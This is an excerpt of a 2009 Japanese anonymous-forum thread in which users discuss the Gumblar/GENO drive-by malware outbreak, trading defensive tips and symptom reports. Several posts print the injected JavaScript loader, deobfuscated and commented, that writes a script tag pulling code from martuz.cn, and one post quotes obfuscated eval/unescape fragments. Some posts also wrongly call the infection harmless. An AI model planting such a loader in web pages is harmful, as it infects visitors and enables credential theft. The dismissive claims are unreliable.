document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
}
埋め込まれたJavaScript攻撃コードを読みやすくした奴がこれな
601:名無しさん@お腹いっぱい。
09/05/16 23:40:25
だー、寝れない
だれか絶対に感染しない方法を確立してくれよ
602:名無しさん@お腹いっぱい。
09/05/16 23:40:56
>>601
ネットに繋げない
これマジ最強
603:名無しさん@お腹いっぱい。
09/05/16 23:41:22
>>601
PCをネットに接続しない。
604:名無しさん@お腹いっぱい。
09/05/16 23:41:28
>>601
URLリンク(ja.wikipedia.org)(%E3%82%A6%E3%82%A7%E3%83%96%E3%83%96%E3%83%A9%E3%82%A6%E3%82%B6)
605:名無しさん@お腹いっぱい。
09/05/16 23:41:58
>>595
www (これはワラでなくワールドワイドウェブだwww)
606:名無しさん@お腹いっぱい。
09/05/16 23:42:00
>>563
安全だって言われても
MacにするとYahoo MovieやBiglobeの動画見られなくなるもん
607:名無しさん@お腹いっぱい。
09/05/16 23:42:21
もうこれでいいんじゃないか?
症状を挙げといても該当しなけりゃ安心ってわけじゃないし。
予防:
Flash PlayerとAdobe Readerを最新版にする。
Adobe ReaderでJavaScriptを無効にする。
可能であればブラウザでもJavaScriptを無効にする。
感染の確認と対策:
複数の亜種が存在し、感染後にどのような症状が現れるかはわからない。
感染した可能性があれば再インストール推奨。
608:名無しさん@お腹いっぱい。
09/05/16 23:42:42
当分自宅のPCはメールチェックと2chしか見ない
609:名無しさん@お腹いっぱい。
09/05/16 23:42:46
まだ不確かな材料出していきがってる奴がいるのか
610:名無しさん@お腹いっぱい。
09/05/16 23:42:48
adobe夕方アップデートしたけど又来てるよ
みんなもチェックすると良いよ
611:名無しさん@お腹いっぱい。
09/05/16 23:43:06
Linuxなら兵器だよな?
612:名無しさん@お腹いっぱい。
09/05/16 23:43:51
常々申し上げているとおり
FireFoxが安全なのは標的にならなかったからです。
他に安全な理由は一切ありません。
613:名無しさん@お腹いっぱい。
09/05/16 23:43:52
Flash PlayerとAdobe Readerの最新版って今どれ?
614:名無しさん@お腹いっぱい。
09/05/16 23:44:11
>>601
ネットカフェいけば感染し放題だぜ!
家電量販店でもいいぜ!
615:名無しさん@お腹いっぱい。
09/05/16 23:44:40
>>612
ブロックしてくれるのもFirefoxだけだがな
616:名無しさん@お腹いっぱい。
09/05/16 23:44:55
>>600
これだと、ChromeとNT 6以上を除外してるだけだな。
Firefoxも対象だ。
617:名無しさん@お腹いっぱい。
09/05/16 23:45:09
正直OPERAがダメだったのに狐だけが安全って気はしないんだけどどうなんだろ
今はPS3からなんでコレはいくらなんでも安全だろうがな
PDF開けんからなw
2kだといろいろあって再インスコが気が遠くなるな
不愉快だがビスタ買おうかしら
618:名無しさん@お腹いっぱい。
09/05/16 23:45:16
>>600
Chromeは感染対象から外れてたのか
619:名無しさん@お腹いっぱい。
09/05/16 23:45:20
>>615
え?
620:名無しさん@お腹いっぱい。
09/05/16 23:45:28
>>610
flash playerのほうか?
621:名無しさん@お腹いっぱい。
09/05/16 23:45:46
Google Chromeは?
622:名無しさん@お腹いっぱい。
09/05/16 23:45:57
>>617
ちょっとPS3買ってくるわ
623:名無しさん@お腹いっぱい。
09/05/16 23:45:57
>>547
URLリンク(ja.wikipedia.org)
624:名無しさん@お腹いっぱい。
09/05/16 23:46:09 BE:2114127195-PLT(12500)
URLリンク(safebrowsing.clients.google.com)
>不正なソフトウェアをホストしていたかどうか
>はい、このサイトでは不正なソフトウェアのホスティングが過去 90 日の間に検知されています。sangsangmadang.com/, wz114.com/, futuraproject.cz/ を含む 10168 個のドメインを感染させています。
10168個のドメイン・・・だと?
625:名無しさん@お腹いっぱい。
09/05/16 23:46:18
>>613
ここの情報を基にしたり、ここで聞いたりするより、Adobeのサイト行って調べた方が確実だと思われ
626:名無しさん@お腹いっぱい。
09/05/16 23:46:24
>>600
埋め込まれるスクリプトも進化してるんだな。これだとFirefoxも危険だ。
627:名無しさん@お腹いっぱい。
09/05/16 23:46:28
>>622
つ ドリームキャスト
628:名無しさん@お腹いっぱい。
09/05/16 23:46:39
このスレ5人ぐらいで回してるの?
629:名無しさん@お腹いっぱい。
09/05/16 23:47:02
また中国か
630:名無しさん@お腹いっぱい。
09/05/16 23:47:22
>>600
今いちばん安全なのはChromeってことか。
631:名無しさん@お腹いっぱい。
09/05/16 23:47:24
>>501>>514>>518
Sleipnir → Firefox3 移行推進計画
URLリンク(ktrue.blog.shinobi.jp)
ここに書かれてるの片っ端から入れたら楽に乗り換えられた
今じゃアドオン探しに夢中だわ
632:名無しさん@お腹いっぱい。
09/05/16 23:47:27
>>628
ここには俺とお前しかしないよ
633:名無しさん@お腹いっぱい。
09/05/16 23:47:53
vistでsqlsodbc.chmファイルが3つ出てくるんだが・・
あと二つのサイズが50,004 バイト、48,663 バイト
オワタ・・?
634:名無しさん@お腹いっぱい。
09/05/16 23:48:24
>>630
一番安全なのはマックに決まってるだろ
635:名無しさん@お腹いっぱい。
09/05/16 23:48:24
>>619
え?
URLリンク(www.dotup.org)
636:名無しさん@お腹いっぱい。
09/05/16 23:48:28
>>632
2人だけか
637:名無しさん@お腹いっぱい。
09/05/16 23:48:32
みんなスクリプトだよ
638:名無しさん@お腹いっぱい。
09/05/16 23:48:35
>>629
実際には中国じゃないよ
639:名無しさん@お腹いっぱい。
09/05/16 23:48:47
IE→危険
火狐→危険水域に達しつつある?
くらいのキモチでいればOK?
640:名無しさん@お腹いっぱい。
09/05/16 23:49:00
内部破壊するわけでもないし
FWで十分なのになんで騒いでるんだろ・・
ここのトピの人達って情弱?
641:名無しさん@お腹いっぱい。
09/05/16 23:49:00
>>633
Vistaならそれは普通
642:名無しさん@お腹いっぱい。
09/05/16 23:49:01
ウィルス作った奴誰だよ
俺の貴重なホリデイをブッ潰しやがって
許せねぇ
643:名無しさん@お腹いっぱい。
09/05/16 23:49:34
>>634
常々申し上げているとおり
Macが安全なのはry
644:名無しさん@お腹いっぱい。
09/05/16 23:49:38
>>635
知ってたか、それGoogleの機能なんだぜ
645:名無しさん@お腹いっぱい。
09/05/16 23:49:48
感染したらどうなんの?
646:名無しさん@お腹いっぱい。
09/05/16 23:49:55
オレはグーグル クロムで勝ち組だわw
647:名無しさん@お腹いっぱい。
09/05/16 23:50:12
Seamonkeyもやばいの?
648:名無しさん@お腹いっぱい。
09/05/16 23:50:43
>>644
うん知ってるよ
で?他のブラウザは?
649:名無しさん@お腹いっぱい。
09/05/16 23:50:43
>>639
特に区別無くどちらも対象にされてるからどっちが安全とか無いよ
今でこそ判定文付けてるけど、そのうち全ての環境で感染できるか試すようになるかもね
650:名無しさん@お腹いっぱい。
09/05/16 23:51:15
>>640
お前の自慢のFWで>>324を全部踏んできてもらおうか
651:名無しさん@お腹いっぱい。
09/05/16 23:51:37
>>649
ここ数日見てると何かそれくせえ。
652:名無しさん@お腹いっぱい。
09/05/16 23:51:38
JavaScript切ったら、Google先生の検索結果に出てた
安全サイト確認ロゴも消えてしまった
653:名無しさん@お腹いっぱい。
09/05/16 23:51:59
>>650
全部踏んできたお
654:名無しさん@お腹いっぱい。
09/05/16 23:52:14
バージョンに関してはまとめとかに書いといてもしょうがないんだよな。
いつ更新されるかわからないんだし。
655:名無しさん@お腹いっぱい。
09/05/16 23:52:19 BE:1503380148-PLT(12500)
ドメイン的に発信源は中国と思ってたんだけど
中国じゃないの?
ちなみにgumblar.cnはもう死んでるからいまさらこのドメインブロックしても意味ないんだよね
656:名無しさん@お腹いっぱい。
09/05/16 23:52:22
なんだなんだ
結局GoogleChromeが最強のブラウザ決定?
657:名無しさん@お腹いっぱい。
09/05/16 23:52:32
>>631
参考にしてみる
ありがとう
658:名無しさん@お腹いっぱい。
09/05/16 23:52:34
>>645
ほかの人うつす可能性があるだけで事実上無害
気にするだけ損なウィルス
659:名無しさん@お腹いっぱい。
09/05/16 23:53:03
>>641
おお、そうなのか。複数出てくるのは普通なのか。
サイズが違うのはやっぱりまずい?
660:名無しさん@お腹いっぱい。
09/05/16 23:53:25
>>656
Netscape
661:名無しさん@お腹いっぱい。
09/05/16 23:53:37
>>655
gumblar.cnの設置場所はロシアだけど、犯人(グループ)がどこにいるかは
わからんね。
662:名無しさん@お腹いっぱい。
09/05/16 23:53:42
Vista用のテンプレもなかったっけ?
どこいった?
663:名無しさん@お腹いっぱい。
09/05/16 23:53:43
>>650
同じくFWだけで踏んできたが何か?
664:名無しさん@お腹いっぱい。
09/05/16 23:53:55
>>655
別にドメインが中国でも実際に使ってるのは中国人じゃない可能性はあるだろ
665:名無しさん@お腹いっぱい。
09/05/16 23:53:57
>>658
豚インフルに似てるな
666:名無しさん@お腹いっぱい。
09/05/16 23:54:08
いつ攻撃法をJavaScriptからActiveXへ変えるのだろうか
667:名無しさん@お腹いっぱい。
09/05/16 23:54:16
サイト側が感染する時って
どういう仕組みで感染するんですか?
668:名無しさん@お腹いっぱい。
09/05/16 23:54:23
知ってる範囲で感染サイトまとめくれ
ν速じゃ4Gamerとか痛いニュースやYourFilehostが感染だの憶測が飛びまくってて分からん
669:名無しさん@お腹いっぱい。
09/05/16 23:54:31
いつになったらおさまるのだろうか
対策はしているがまた亜種が出てきたらどうしようかとか色々考えてしまう
670:名無しさん@お腹いっぱい。
09/05/16 23:55:31
>>667
スクリプト踏んで感染したPCからftpパスワードを抜かれる
671:名無しさん@お腹いっぱい。
09/05/16 23:55:52
最新の検体だとF-Secureひっかからないのか…
とりあえずSASに記録しとくか…
672:名無しさん@お腹いっぱい。
09/05/16 23:56:33
ノートンじゃ反応しないらしいからオンラインスキャンしたいんだけどどこ使えばいいのか
673:名無しさん@お腹いっぱい。
09/05/16 23:57:05
火スペ!
674:名無しさん@お腹いっぱい。
09/05/16 23:57:10
>>658
え・・・?
675:名無しさん@お腹いっぱい。
09/05/16 23:57:26
>>658
* コマンドプロンプトを実行中ではないのにcmd.exeが起動している
* cmdやregeditが起動しない(Explorerが落ちる)
* 特定のサイトに接続できなくなる
* ブラウジングがまともにできない
* Adobeが5分に1回のペースで更新を要求してくる
* CPUの稼働率が何も作業していないのに50%近くに上がる(CPUのコア数によって違う)
こんな症状が報告されてるがな
愚痴。
判りもしないで騒ぐなって馬鹿いるけど、だったらウイルスの挙動を完全に解析してくれ。
それができない・亜種が発生し続けてるから何されるか完全に把握できないってのに。
676:名無しさん@お腹いっぱい。
09/05/16 23:57:26
>>648
Chromeにはあるんじゃね?
677:名無しさん@お腹いっぱい。
09/05/16 23:57:54
>>972
カスペルスキー
URLリンク(www.kaspersky.co.jp)
感染してたらこれが検出
URLリンク(dec.2chan.net:81)
678:名無しさん@お腹いっぱい。
09/05/16 23:58:06
fc2ブログ見れなくなった…
俺だけでしょうか?
679:名無しさん@お腹いっぱい。
09/05/16 23:58:24
URLリンク(search.chiebukuro.yahoo.co.jp)
HTMLにいつのまにか謎の文字列が挿入されています。 ...2fsc:72ipt:3e:22):3b:7d';
var Mdpko=FPCN.replace(Y3n5P,MRfH);eval(unescape(Mdpko))})(/:/g); --></script>
ヨミサーチを設置後、htmlソースがおかしくなりました。 スクリプト記述部が
<script language=javascript><!-- (function(t){eval(unescape
感染広がりまくりwwwwwうぇwwwwwww
680:名無しさん@お腹いっぱい。
09/05/16 23:58:32
var j = "", u = navigator.userAgent;
if(
(u.indexOf("Chrome")<0) && //Chrome以外ならtrue
(u.indexOf("Win")>0) && //Windowsならtrue
(u.indexOf("NT 6")<0) && //WindowsNT6以外ならtrue(XPはNT5.1、VistaはNT6.0)
(document.cookie.indexOf("miek=1")<0) &&
(typeof(zrvzts)!=typeof("A"))
){
zrvzts="A";
if(window.ScriptEngine){ //IEのVBscriptが実行できるならtrue
j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();//VBScriptの命令の羅列(詳しくはググれ)
}
document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"); //scriptタグ書き出し
}
更に読みやすくしてコメント付けてみた
IEでVBScript使えないと動かないっぽいね
681:名無しさん@お腹いっぱい。
09/05/16 23:58:33
一週間くらいでワクチン対応くるかな
682:名無しさん@お腹いっぱい。
09/05/16 23:58:37
>>672
オンラインスキャンでも最新亜種は検出しないよ。
検体を提出してもクリーン判定されちゃうもの。
683:名無しさん@お腹いっぱい。
09/05/17 00:00:19
>>672カスぺとかじゃない…
なんかもうどのソフトも後手後手だから、予防対策とっておとなしくしてるわ…
亜種出まくりだし。
なんか変な感じするなぁ。
684:名無しさん@お腹いっぱい。
09/05/17 00:01:00
恐らくワクチンが出来るまでに>>681はあぼーんする可能性99.8%
685:名無しさん@お腹いっぱい。
09/05/17 00:01:00
>>675
UPX解凍しても中身が全部見えない
u.batの挙動は海外サイトで纏められてるが、残念ながら不明
686:名無しさん@お腹いっぱい。
09/05/17 00:01:01
夜になって急に騒がしくなってきたな
687:名無しさん@お腹いっぱい。
09/05/17 00:01:18 BE:1127535146-PLT(12500)
>>664
中国人が発信源じゃなくて、中国が発信源と思ってたの
688:名無しさん@お腹いっぱい。
09/05/17 00:01:30
コキントーとかの私用パソコンが感染したらどうなるんだろか?
犯人が中国人だったら死刑だろーなw
689:名無しさん@お腹いっぱい。
09/05/17 00:01:54
そりゃまあ対策ソフトなんだし先手はありえんな
690:名無しさん@お腹いっぱい。
09/05/17 00:02:10
OperaでJS、Java、FlashとReaderのプラグインを切る、これ最強
691:名無しさん@お腹いっぱい。
09/05/17 00:02:13
>>675
亜種っていっても、FlashとPDFの脆弱性を利用しているという点ではずっと一貫してると思うんだが。
だから呼びかけられてる予防方法はずっと変わってないだろ。
つーかそこに挙がってる症状は、とりあえず感染の目安になるってだけじゃないのか。
問題はトロイを仕込まれるってとこなんじゃないか?
692:名無しさん@お腹いっぱい。
09/05/17 00:02:31
少なくともGENOで確認されて一月経過してて、他所ではもっと前から感染してるのに、
一向に対策が進まない現状
693:名無しさん@お腹いっぱい。
09/05/17 00:02:36
もうわけわからん
694:名無しさん@お腹いっぱい。
09/05/17 00:02:37
これ外国でも騒ぎになってるのか?
695:名無しさん@お腹いっぱい。
09/05/17 00:02:38
UACの偉大さ
696:名無しさん@お腹いっぱい。
09/05/17 00:02:52
>>675
とくに深刻な症状でもないね
気にするだけ無駄ってのが正解かも
キンタマで人生終わるとかじゃないからw
697:名無しさん@お腹いっぱい。
09/05/17 00:02:54
fc2はfc2ブログだけじゃなく、fc2.comも開けなくなってるな。
fc2.comの管理者が食らってメンテ中か?
698:名無しさん@お腹いっぱい。
09/05/17 00:03:06
>>680
違う。
IEの場合はj=以降にjscript.dllのバージョンが入ってmartuz.cnを呼び出す。
その他のブラウザはj=以降に何も入らずにmartuz.cnを呼び出す。
その違いだけ。
699:名無しさん@お腹いっぱい。
09/05/17 00:03:17
>>687
URLリンク(www.trendmicro.com)
ワームは、UTC (協定世界時)に基づき、250のランダムなWebサイトを含むURLのリストを毎日作成します。
例えば、算定された文字列が "abcdef" の場合、ワームは、この文字列の末尾に、".biz" や
".inf" や ".org" や ".net" や ".com" の文字列を追加します。これにより、
URLは、"abcdef.biz" や "abcdef.info" や "abcdef.org" や "abcdef.net" や "abcdef.com" となります。
700:名無しさん@お腹いっぱい。
09/05/17 00:03:40
>>635
IE8でも、検索サイトをGoogleに設定しているとそうなるらしいけど、
俺は怖くて試していない
701:名無しさん@お腹いっぱい。
09/05/17 00:03:44
>>678
同人板でも話題になってた
いつものことなのかそうでないのかの判断がつかない状況
702:名無しさん@お腹いっぱい。
09/05/17 00:04:00
なんか火消しに奔走する奴が出始めたな
どこかの関係者か?
703:名無しさん@お腹いっぱい。
09/05/17 00:04:19
ソースチェッカーオンラインが「アクセス規制中です 現在、大規模な攻撃を受けており」だってさ
同人板の連中が殺到してんだな・・・乙
704:名無しさん@お腹いっぱい。
09/05/17 00:04:53
そもそも犯人の目的は何なんだ?
705:名無しさん@お腹いっぱい。
09/05/17 00:05:12
>>704
おまいのアナル
706:名無しさん@お腹いっぱい。
09/05/17 00:05:12
GENOの人居るんでしょ?
ちゃんと責任取ってよね
キャッシュ消せば大丈夫とかよくも大嘘こいてくれたな
707:名無しさん@お腹いっぱい。
09/05/17 00:05:41
>>704
Vistaの普及
708:名無しさん@お腹いっぱい。
09/05/17 00:05:47
ブルスク気にしないのか
709:名無しさん@お腹いっぱい。
09/05/17 00:05:48
genoはどんどん名が売れていくな
よかったじゃんw
710:名無しさん@お腹いっぱい。
09/05/17 00:05:52
とにかくjs切ってサイト閲覧してれば大丈夫ってことだよね?
711:名無しさん@お腹いっぱい。
09/05/17 00:06:01
>>704
目的の一つはアフィ。
検索結果のリンク先を書き換えるらしい。
712:名無しさん@お腹いっぱい。
09/05/17 00:06:10
同人同人騒いでるのってあの人でしょ
713:名無しさん@お腹いっぱい。
09/05/17 00:06:14
結局vistaなら大丈夫なの?
714:名無しさん@お腹いっぱい。
09/05/17 00:06:45
>>707
俺すでにびすたんだよ
715:名無しさん@お腹いっぱい。
09/05/17 00:06:59
>>695
この間仕方なしにVistaに変えたけどそれオンにしていたら
どんな警告出るの?
716:名無しさん@お腹いっぱい。
09/05/17 00:07:34
>>710
今のところはね。
いつまでもjavascriptだけとは思えないけどね。
javascriptのバージョン判定部分なんかも書き方変わってきてるし。
717:名無しさん@お腹いっぱい。
09/05/17 00:07:35
>>696
ゾンビになって犯罪に加担することになります
ある日警察がきます
718:名無しさん@お腹いっぱい。
09/05/17 00:07:40
>>704
大規模なボットネットを手に入れるためじゃない
その手の世界では結構な高額で売れるんだとか
GENOウイルス自体は感染を広める為だけの物だから解釈によっては無害とか言うことも可能なんだろう
でもゾンビ化してるから後から遠隔操作で何されるかはわからん
719:名無しさん@お腹いっぱい。
09/05/17 00:07:44
>>706
/) □
///) □
/,.=゙''"/ □
/ i f ,.r='"-‐'つ____ 角砂糖3個やろう
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /